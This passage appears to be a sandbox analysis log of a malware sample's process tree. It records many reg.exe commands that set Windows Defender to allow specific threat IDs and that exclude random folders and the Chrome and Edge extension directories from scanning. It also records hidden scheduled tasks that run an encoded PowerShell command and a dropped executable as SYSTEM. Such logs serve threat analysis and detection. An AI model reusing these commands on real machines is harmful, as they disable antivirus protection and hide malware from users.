Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:3448
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5772
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3936
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3196
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3656
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AqhCymdmIBUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AqhCymdmIBUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\COTBHeEKJKUzC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\COTBHeEKJKUzC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QubjZgZsgVxU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QubjZgZsgVxU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XhLCDmquyDmYC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XhLCDmquyDmYC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kiKoPuWzhpUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kiKoPuWzhpUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rtDrRvuxKPwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rtDrRvuxKPwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tSRsKJOgU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tSRsKJOgU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vlCOWAlJU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vlCOWAlJU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vykAhZeXpicBybwuUhR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vykAhZeXpicBybwuUhR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cxMrmvGIsbUIWOVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cxMrmvGIsbUIWOVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mjUPcNFqgWzmMMVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mjUPcNFqgWzmMMVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HebvCWsvsSBbqJEHU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HebvCWsvsSBbqJEHU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gGlzHXLNukBnGkUk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gGlzHXLNukBnGkUk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rfjZnoYAHKowyeWd\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rfjZnoYAHKowyeWd\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:3204
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AqhCymdmIBUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4544
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AqhCymdmIBUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AqhCymdmIBUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COTBHeEKJKUzC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COTBHeEKJKUzC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QubjZgZsgVxU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QubjZgZsgVxU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XhLCDmquyDmYC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XhLCDmquyDmYC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kiKoPuWzhpUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kiKoPuWzhpUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qZsdLtoLnmdMsAbZENR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5604
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rtDrRvuxKPwU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rtDrRvuxKPwU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tSRsKJOgU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tSRsKJOgU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vlCOWAlJU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vlCOWAlJU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1140
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vykAhZeXpicBybwuUhR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vykAhZeXpicBybwuUhR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cxMrmvGIsbUIWOVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cxMrmvGIsbUIWOVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mjUPcNFqgWzmMMVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mjUPcNFqgWzmMMVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HebvCWsvsSBbqJEHU /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HebvCWsvsSBbqJEHU /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4232
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PKLMGLEKhliiDLHGb /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gGlzHXLNukBnGkUk /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gGlzHXLNukBnGkUk /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rfjZnoYAHKowyeWd /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rfjZnoYAHKowyeWd /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5996
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gRdEjuwxR" /SC once /ST 01:11:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2540
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gRdEjuwxR"
  2⤵
  PID:1396
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gRdEjuwxR"
  2⤵
  PID:5020
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "YNRMAHHYAWtfapctR" /SC once /ST 00:47:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gGlzHXLNukBnGkUk\JuzkbKfKfyDoQdV\jJQHaHd.exe\" p2 /OkUZdidDl 385132 /S" /V1 /F
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3512
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "YNRMAHHYAWtfapctR"
  2⤵
  PID:5812
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 632
  2⤵
  - Program crash
  PID:4020

